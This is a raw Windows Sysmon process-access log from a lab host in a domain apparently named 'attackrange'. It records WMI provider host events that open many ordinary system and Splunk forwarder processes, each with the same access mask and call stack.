15:59:22.241{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5356-6008-3906-00000000A301}4832C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024078Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.241{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5354-6008-3406-00000000A301}6596C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024077Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.241{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5353-6008-2F06-00000000A301}3716C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024076Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.241{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4405-00000000A301}7000C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024075Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.241{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4305-00000000A301}7420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024074Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.241{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4DC0-6008-FB02-00000000A301}8056C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024073Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.241{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A9B-6008-1501-00000000A301}6076C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024072Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.241{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024071Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.241{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024070Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.241{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FF00-00000000A301}4808C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024069Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.241{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FC00-00000000A301}5008C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024068Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.241{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F600-00000000A301}1548C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024067Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.241{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F300-00000000A301}4180C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024066Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.241{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A27-6008-E400-00000000A301}2860C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024065Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.226{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A22-6008-DB00-00000000A301}4244C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024064Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.226{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A1A-6008-B100-00000000A301}2640C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024063Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.226{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024062Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.226{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A11-6008-9600-00000000A301}4612C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024061Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.226{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8200-00000000A301}4876C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024060Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.226{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8100-00000000A301}4864C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024059Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 